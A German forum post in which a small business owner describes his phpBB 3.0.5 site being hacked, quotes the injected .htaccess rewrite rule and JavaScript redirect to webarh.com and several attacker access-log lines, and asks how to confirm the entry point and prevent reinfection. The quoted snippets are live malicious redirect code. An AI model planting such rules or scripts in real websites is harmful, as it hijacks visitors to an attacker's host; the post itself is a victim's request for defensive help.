unser Webspace wurde am vergangenen Wochenende gehackt und mit "webarh.com" infiziert. (Näheres zu dieser "Infektion" unter diesem Link )
Auf dem Webspace lag neben dem phpbb3-Forum nur noch phpmyadmin, die HTML Startseite zu unserer kommerziellen Seite und ein paar in diversen Ordnern verteilte Bilder.
Ich gestehe auch gleich, dass das Forum noch in der Version 3.0.5 installiert war...
Der Infrekt wirkte sich jedenfalls so aus, dass in allen Ordnern eine .htaccess Datei abgelegt wurde die folgenden Inhalt hatte:
Code: Alles auswählen
RewriteEngine On
RewriteBase /
RewriteRule ^(.*)? http://webarh.com/dbcab8eea60ec75e98086c2884d0afc4
Code: Alles auswählen
<script>document.location.href='http://webarh.com/4d6195a527923898c6931f00385946d1';</script>
Code: Alles auswählen
213.231.60.3 - - [02/Dec/2010:10:40:26 +0100] "GET /phpBB3/posting.php?mode=post&f=13%2B%2B%2B%2B%2B%2BResult:%2B%25E8%25F1%25EF%25EE%25EB%25FC%25E7%25EE%25E2%25E0%25ED%2B%25ED%25E8%25EA%25ED%25E5%25E9%25EC%2B%2522Memikara%2522;%25EF%25E8%25EA%25F2%25EE%25EA%25EE%25E4%2B%25E4%25E5%25F8%25E8%25F4%25F0%25EE%25E2%25E0%25ED;%25F3%25F1%25EF%25E5%25F5%2B-%2B%25E7%25E0%25EF%25EE%25F1%25F2%25E8%25EB%25E8%2B%25E2%2B%25F0%25E0%25E7%25E4%25E5%25EB%2B%2522General%2BQuestions%2522;BB-%25EA%25EE%25E4%2B%25ED%25E5%2B%25F0%25E0%25E1%25EE%25F2%25E0%25E5%25F2;+Result:+%E8%F1%EF%EE%EB%FC%E7%EE%E2%E0%ED+%ED%E8%EA%ED%E5%E9%EC+%22Memikara%22;%EF%E8%EA%F2%EE%EA%EE%E4+%E4%E5%F8%E8%F4%F0%EE%E2%E0%ED;%F3%F1%EF%E5%F5;BB-%EA%EE%E4+%ED%E5+%F0%E0%E1%EE%F2%E0%E5%F2; Result: \xe8\xf1\xef\xee\xeb\xfc\xe7\xee\xe2\xe0\xed \xed\xe8\xea\xed\xe5\xe9\xec \"Likarrkinaw\";\xef\xe8\xea\xf2\xee\xea\xee\xe4 \xe4\xe5\xf8\xe8\xf4\xf0\xee\xe2\xe0\xed;\xf3\xf1\xef\xe5\xf5;BB-\xea\xee\xe4 \xed\xe5 \xf0\xe0\xe1\xee\xf2\xe0\xe5\xf2; HTTP/1.0" 200 17463 "http://www.leder-pflege.de/phpBB3/posting.php?mode=post&f=13%2B%2B%2B%2B%2B%2BResult:%2B%25E8%25F1%25EF%25EE%25EB%25FC%25E7%25EE%25E2%25E0%25ED%2B%25ED%25E8%25EA%25ED%25E5%25E9%25EC%2B%2522Memikara%2522;%25EF%25E8%25EA%25F2%25EE%25EA%25EE%25E4%2B%25E4%25E5%25F8%25E8%25F4%25F0%25EE%25E2%25E0%25ED;%25F3%25F1%25EF%25E5%25F5%2B-%2B%25E7%25E0%25EF%25EE%25F1%25F2%25E8%25EB%25E8%2B%25E2%2B%25F0%25E0%25E7%25E4%25E5%25EB%2B%2522General%2BQuestions%2522;BB-%25EA%25EE%25E4%2B%25ED%25E5%2B%25F0%25E0%25E1%25EE%25F2%25E0%25E5%25F2;+Result:+%E8%F1%EF%EE%EB%FC%E7%EE%E2%E0%ED+%ED%E8%EA%ED%E5%E9%EC+%22Memikara%22;%EF%E8%EA%F2%EE%EA%EE%E4+%E4%E5%F8%E8%F4%F0%EE%E2%E0%ED;%F3%F1%EF%E5%F5;BB-%EA%EE%E4+%ED%E5+%F0%E0%E1%EE%F2%E0%E5%F2; Result: \xe8\xf1\xef\xee\xeb\xfc\xe7\xee\xe2\xe0\xed \xed\xe8\xea\xed\xe5\xe9\xec \"Likarrkinaw\";\xef\xe8\xea\xf2\xee\xea\xee\xe4 \xe4\xe5\xf8\xe8\xf4\xf0\xee\xe2\xe0\xed;\xf3\xf1\xef\xe5\xf5;BB-\xea\xee\xe4 \xed\xe5 \xf0\xe0\xe1\xee\xf2\xe0\xe5\xf2;" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)"
213.231.60.3 - - [02/Dec/2010:10:40:26 +0100] "GET /phpBB3/ucp.php?mode=confirm&id=83f01a707998c3a36dfc83103c33e1f6&type=3&sid=4085b78a7c16f141fcbd11b0eb84e26d HTTP/1.0" 200 9081 "http://www.leder-pflege.de/phpBB3/posting.php?mode=post&f=13%2B%2B%2B%2B%2B%2BResult:%2B%25E8%25F1%25EF%25EE%25EB%25FC%25E7%25EE%25E2%25E0%25ED%2B%25ED%25E8%25EA%25ED%25E5%25E9%25EC%2B%2522Memikara%2522;%25EF%25E8%25EA%25F2%25EE%25EA%25EE%25E4%2B%25E4%25E5%25F8%25E8%25F4%25F0%25EE%25E2%25E0%25ED;%25F3%25F1%25EF%25E5%25F5%2B-%2B%25E7%25E0%25EF%25EE%25F1%25F2%25E8%25EB%25E8%2B%25E2%2B%25F0%25E0%25E7%25E4%25E5%25EB%2B%2522General%2BQuestions%2522;BB-%25EA%25EE%25E4%2B%25ED%25E5%2B%25F0%25E0%25E1%25EE%25F2%25E0%25E5%25F2;+Result:+%E8%F1%EF%EE%EB%FC%E7%EE%E2%E0%ED+%ED%E8%EA%ED%E5%E9%EC+%22Memikara%22;%EF%E8%EA%F2%EE%EA%EE%E4+%E4%E5%F8%E8%F4%F0%EE%E2%E0%ED;%F3%F1%EF%E5%F5;BB-%EA%EE%E4+%ED%E5+%F0%E0%E1%EE%F2%E0%E5%F2; Result: \xe8\xf1\xef\xee\xeb\xfc\xe7\xee\xe2\xe0\xed \xed\xe8\xea\xed\xe5\xe9\xec \"Likarrkinaw\";\xef\xe8\xea\xf2\xee\xea\xee\xe4 \xe4\xe5\xf8\xe8\xf4\xf0\xee\xe2\xe0\xed;\xf3\xf1\xef\xe5\xf5;BB-\xea\xee\xe4 \xed\xe5 \xf0\xe0\xe1\xee\xf2\xe0\xe5\xf2;" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)"
213.231.60.3 - - [02/Dec/2010:10:40:32 +0100] "POST /phpBB3/posting.php?mode=post&f=13&sid=4085b78a7c16f141fcbd11b0eb84e26d HTTP/1.0" 200 16485 "http://www.leder-pflege.de/phpBB3/posting.php?mode=post&f=13%2B%2B%2B%2B%2B%2BResult:%2B%25E8%25F1%25EF%25EE%25EB%25FC%25E7%25EE%25E2%25E0%25ED%2B%25ED%25E8%25EA%25ED%25E5%25E9%25EC%2B%2522Memikara%2522;%25EF%25E8%25EA%25F2%25EE%25EA%25EE%25E4%2B%25E4%25E5%25F8%25E8%25F4%25F0%25EE%25E2%25E0%25ED;%25F3%25F1%25EF%25E5%25F5%2B-%2B%25E7%25E0%25EF%25EE%25F1%25F2%25E8%25EB%25E8%2B%25E2%2B%25F0%25E0%25E7%25E4%25E5%25EB%2B%2522General%2BQuestions%2522;BB-%25EA%25EE%25E4%2B%25ED%25E5%2B%25F0%25E0%25E1%25EE%25F2%25E0%25E5%25F2;+Result:+%E8%F1%EF%EE%EB%FC%E7%EE%E2%E0%ED+%ED%E8%EA%ED%E5%E9%EC+%22Memikara%22;%EF%E8%EA%F2%EE%EA%EE%E4+%E4%E5%F8%E8%F4%F0%EE%E2%E0%ED;%F3%F1%EF%E5%F5;BB-%EA%EE%E4+%ED%E5+%F0%E0%E1%EE%F2%E0%E5%F2; Result: \xe8\xf1\xef\xee\xeb\xfc\xe7\xee\xe2\xe0\xed \xed\xe8\xea\xed\xe5\xe9\xec \"Likarrkinaw\";\xef\xe8\xea\xf2\xee\xea\xee\xe4 \xe4\xe5\xf8\xe8\xf4\xf0\xee\xe2\xe0\xed;\xf3\xf1\xef\xe5\xf5;BB-\xea\xee\xe4 \xed\xe5 \xf0\xe0\xe1\xee\xf2\xe0\xe5\xf2;" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)"
Nachdem ich alle Index-Dateien gesäubert und die .htaccess Dateien gelöscht hatte, habe ich alle Server-Passwörter geändert. Danach lief alles wieder einwandfrei, allerdings gerade mal 24 Stunden. - Dann waren dann wieder alle .htaccess-Dateien und Änderungen an den index-Dateien in ähnlicher Form da.
Ich habe nun das Forum vorerst komplett vom Server gelöscht und seit dem ist Ruhe.
Ich bin jetzt natürlich etwas verunsichert, was die Neuinstallation des Forums betrifft, da es für mich ganz danach aussieht, dass die "Freunde" aus der Ukraine über das Forum eingedrungen sind, deshalb meine Fragen in die Runde:
1. Kann vielleicht jemand von Euch die Logs entschlüsseln um diese Annahme zu bestägigen, bzw. zu entkräften?
2. Bringt es für die Sicherheit der Geschäflich genutzten Startseite etwas, wenn ich die Neuinstallation auf einer Sub-Domain durchführe?
3. Gab es bei den Versionen vor 3.0.8 irgendwelche Sicherheits-/Schlupflöcher für diese Art von Angriffen, die jetzt geschlossen sind?
4. Wie kann ich solche Angriffe zukünftig verhindern? (Klar 100%ige Sicherheit wird es nie geben, aber 99% wären ja auch schon was... )
Ich würde mich freuen, wenn jemand meine Fragen beantworten, bzw etwas dazu sagen könnte...
Viele Grüße aus dem Norden
Michael